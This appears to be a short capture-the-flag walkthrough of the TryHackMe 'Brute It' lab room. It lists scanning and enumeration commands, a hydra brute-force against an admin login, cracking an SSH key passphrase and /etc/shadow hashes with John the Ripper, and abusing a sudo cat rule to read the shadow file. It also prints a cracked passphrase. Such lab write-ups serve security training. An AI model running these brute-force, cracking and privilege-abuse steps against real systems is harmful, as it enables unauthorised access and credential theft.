Brute It
Room Link: https://tryhackme.com/room/bruteit
Initial Scan
Kali
nmap -A $VICTIM
Scan all ports
No other ports found.
Kali
nmap -sV -sT -O -p 1-65535 $VICTIMTCP/80 - HTTP
gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
Kali
hydra -l admin -P /usr/share/wordlists/SecLists/Passwords/darkweb2017-top10000.txt $VICTIM http-post-form "/admin/:user=^USER^&pass=^PASS^:F=invalid" -V
Kali
/opt/john/ssh2john.py id_rsa > id_john.txt
john --wordlist=/usr/share/wordlists/rockyou.txt id_john.txt 
Kali
chmod 600 id_rsa
ssh -i id_rsa john@$VICTIM
pass: rockinrolljohn can run cat as root, we can just use this to read root.txt but I decided to read the shadow file which I can't do from johns account, then send shadow and passwd files back to Kali to crack.
Victim
sudo -l
LFILE=/etc/shadow
sudo cat "$LFILE"Kali
unshadow passwd shadow > passwords.txt
john --wordlist=/usr/share/wordlists/rockyou.txt passwords.txt
Last updated